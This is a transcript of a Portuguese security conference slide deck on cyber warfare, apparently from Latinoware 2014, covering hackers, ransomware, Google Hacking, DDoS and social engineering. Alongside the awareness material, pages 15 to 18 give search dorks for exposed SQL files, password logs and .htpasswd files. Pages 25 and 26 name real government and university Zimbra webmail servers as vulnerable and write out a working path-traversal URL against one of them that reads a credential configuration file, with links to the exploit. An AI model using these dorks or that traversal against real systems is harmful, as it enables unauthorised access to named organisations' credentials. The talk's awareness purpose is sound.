guerra cibernética 2.0 - latinoware

55
Guerra Cibernética 2.0

Upload: eddy-oliveira

Post on 02-Jul-2015

149 views

Category:

Data & Analytics


6 download

DESCRIPTION

Apresentação feita na latinoware de 2014.

TRANSCRIPT

Page 1: Guerra cibernética 2.0 - Latinoware

Guerra Cibernética 2.0

Page 2: Guerra cibernética 2.0 - Latinoware

CEO da Blackdoor Security, Senior Security Specialist da Futura Networks (Campus

Party) Analista de Segurança Sênior, Gestor em Segurança da Informação,

Empreendedor, Especialista em Segurança da Informação a mais de 15 anos.

Doutor em Segurança da Informação Carnegie Mellon;

Mestre em redes computacionais em University of Michigan;

Graduação em Sistemas da Informação Universidade Presbiteriana Mackenzie

Criou e fundou o LABSS (Laboratório de Segurança e Sustentabilidade –

MACKENZIE). Palestrante atuante em diversas instituições no país, e também é

professor em inúmeras universidades e faculdades do Brasil, com os temas Ethical

Hacker, Cyber Ativismo, Engenharia Social, Cyber Terrorismo, Pedofilia.

Especialista em Guerra Cibernética, Inteligência Cibernética, Hardenning, Mitigação,

Firewall, Stress Testing, analise de Vulnerabilidades.

Dr. Edson Borelli

Page 3: Guerra cibernética 2.0 - Latinoware

Estrutura

Page 4: Guerra cibernética 2.0 - Latinoware
Page 5: Guerra cibernética 2.0 - Latinoware
Page 6: Guerra cibernética 2.0 - Latinoware
Page 7: Guerra cibernética 2.0 - Latinoware
Page 8: Guerra cibernética 2.0 - Latinoware
Page 9: Guerra cibernética 2.0 - Latinoware

Hackers

Page 10: Guerra cibernética 2.0 - Latinoware

Hackers

➔ Mundiais

➔ Brasileiros

Page 11: Guerra cibernética 2.0 - Latinoware

Ransonware!

Ranson…. o que?

Page 12: Guerra cibernética 2.0 - Latinoware
Page 13: Guerra cibernética 2.0 - Latinoware
Page 14: Guerra cibernética 2.0 - Latinoware

Google Hacking

Page 15: Guerra cibernética 2.0 - Latinoware

Google Hacking

Google Hacking é a atividade de usar recursos de busca do site, visando atacar ou proteger

melhor as informações de uma empresa. As informações disponíveis nos servidores web da

empresa provavelmente estarão nas bases de dados do Google.

Um servidor mal configurado pode expor diversas informações da empresa no Google. Não é

difícil conseguir acesso a arquivos de base de dados de sites através do Google.

site:gov.br ext:SQL

Page 16: Guerra cibernética 2.0 - Latinoware

http://www.governoeletronico.gov.br/scripts_sql_novos_relatorio

s/atualizacao_roles.sql

Google Hacking

Page 17: Guerra cibernética 2.0 - Latinoware

Google Hacking

Serviços:

intitle:”VNC Desktop ” inurl:5800

Informações:

filetype:log inurl:”password.log”

Listagem de diretórios:

intitle:”index of” .htpasswd

Page 18: Guerra cibernética 2.0 - Latinoware

site:gov intext:”TOP SECRET//” intext:SI|ORCON|NOFORN

filetype:pdf

Google Hacking

Page 19: Guerra cibernética 2.0 - Latinoware

www.nasa.gov/index.html.old

Google Hacking

Page 20: Guerra cibernética 2.0 - Latinoware
Page 21: Guerra cibernética 2.0 - Latinoware
Page 22: Guerra cibernética 2.0 - Latinoware
Page 23: Guerra cibernética 2.0 - Latinoware

Zimbra 0Day

Page 24: Guerra cibernética 2.0 - Latinoware

Zimbra 0day

O Zimbra oferece um software de servidor e cliente de código aberto para

troca de mensagens e colaboração.

Falha de 2013 continua até hoje em vários servidores zimbra, com uma

pequena pesquisa no google (Google Hacking) podemos achar vários

webmail’s zimbra e até então vulneráveis.

Page 25: Guerra cibernética 2.0 - Latinoware

Zimbra 0day

inurl: webmail & intext:zimbra

https://webmail.salvador.ba.gov.br/

https://webmail.unifei.edu.br/

https://webmail.seduc.ce.gov.br/zimbra/

http://webmail.une.com.co/zimbra/

Page 26: Guerra cibernética 2.0 - Latinoware

Zimbra 0day

http://www.exploit-db.com/exploits/30085/

https://webmail.salvador.ba.gov.br/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxK

eys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../

../../../../../../../../opt/zimbra/conf/localconfig.xml%00

Page 27: Guerra cibernética 2.0 - Latinoware

Zimbra 0day

Page 28: Guerra cibernética 2.0 - Latinoware

Zimbra 0day

Exploit:

➔ http://www.exploit-db.com/exploits/30085/

➔ http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip

Explicação e PoC:

➔ http://securityattack.com.br/emails-do-governo-igrejas-e-empresas-

vulneraveis-em-ano-de-eleicao/

Page 29: Guerra cibernética 2.0 - Latinoware

DDoS

Page 30: Guerra cibernética 2.0 - Latinoware
Page 31: Guerra cibernética 2.0 - Latinoware
Page 32: Guerra cibernética 2.0 - Latinoware
Page 33: Guerra cibernética 2.0 - Latinoware
Page 34: Guerra cibernética 2.0 - Latinoware
Page 35: Guerra cibernética 2.0 - Latinoware
Page 36: Guerra cibernética 2.0 - Latinoware

http://securityattack.com.br/.attack

DDoS

Page 37: Guerra cibernética 2.0 - Latinoware

“O motivo para tudo isso? O

membro que se autointitula

Chronos explicou ao R7, em

entrevista exclusiva.

— A gente decidiu derrubar

todos os TRE e conseguiu. Nós

fazemos isso como protesto a

essa roubalheira que nós

vivemos.”

Page 38: Guerra cibernética 2.0 - Latinoware

Engenharia Social

Page 39: Guerra cibernética 2.0 - Latinoware

Engenharia Social

A arte de enganar

Page 40: Guerra cibernética 2.0 - Latinoware

CEO da Blackdoor Security, Senior Security Specialist da Futura Networks (Campus

Party) Analista de Segurança Sênior, Gestor em Segurança da Informação,

Empreendedor, Especialista em Segurança da Informação a mais de 15 anos.

Doutor em Segurança da Informação Carnegie Mellon;

Mestre em redes computacionais em University of Michigan;

Graduação em Sistemas da Informação Universidade Presbiteriana Mackenzie

Criou e fundou o LABSS (Laboratório de Segurança e Sustentabilidade –

MACKENZIE). Palestrante atuante em diversas instituições no país, e também é

professor em inúmeras universidades e faculdades do Brasil, com os temas Ethical

Hacker, Cyber Ativismo, Engenharia Social, Cyber Terrorismo, Pedofilia. Especialista

em Guerra Cibernética, Inteligência Cibernética, Hardenning, Mitigação, Firewall,

Stress Testing, analise de Vulnerabilidades.

Dr. Edson Borelli

Page 41: Guerra cibernética 2.0 - Latinoware

CEO da Blackdoor Security, Senior Security Specialist da Futura Networks (Campus

Party) Analista de Segurança Sênior, Gestor em Segurança da Informação,

Empreendedor, Especialista em Segurança da Informação a mais de 15 anos.

Doutor em Segurança da Informação Carnegie Mellon;

Mestre em redes computacionais em University of Michigan;

Graduação em Sistemas da Informação Universidade Presbiteriana Mackenzie

Criou e fundou o LABSS (Laboratório de Segurança e Sustentabilidade –

MACKENZIE). Palestrante atuante em diversas instituições no país, e também é

professor em inúmeras universidades e faculdades do Brasil, com os temas Ethical

Hacker, Cyber Ativismo, Engenharia Social, Cyber Terrorismo, Pedofilia. Especialista

em Guerra Cibernética, Inteligência Cibernética, Hardenning, Mitigação, Firewall,

Stress Testing, analise de Vulnerabilidades.

Dr. Edson Borelli

Page 42: Guerra cibernética 2.0 - Latinoware

QR Code

Page 43: Guerra cibernética 2.0 - Latinoware
Page 44: Guerra cibernética 2.0 - Latinoware

QR CodeLink

➔ http://goo.gl/Iwrj5G

Ver

➔ http://www.bds3c.com/evento/log.php

Apagar

➔ http://www.bds3c.com/evento/log.php?cmd=clear

Page 45: Guerra cibernética 2.0 - Latinoware

Engenharia Social

Marketing

Direito

Psicologia

Page 46: Guerra cibernética 2.0 - Latinoware
Page 47: Guerra cibernética 2.0 - Latinoware
Page 48: Guerra cibernética 2.0 - Latinoware
Page 49: Guerra cibernética 2.0 - Latinoware
Page 50: Guerra cibernética 2.0 - Latinoware
Page 51: Guerra cibernética 2.0 - Latinoware
Page 52: Guerra cibernética 2.0 - Latinoware
Page 53: Guerra cibernética 2.0 - Latinoware
Page 54: Guerra cibernética 2.0 - Latinoware

Obrigado!!!

Page 55: Guerra cibernética 2.0 - Latinoware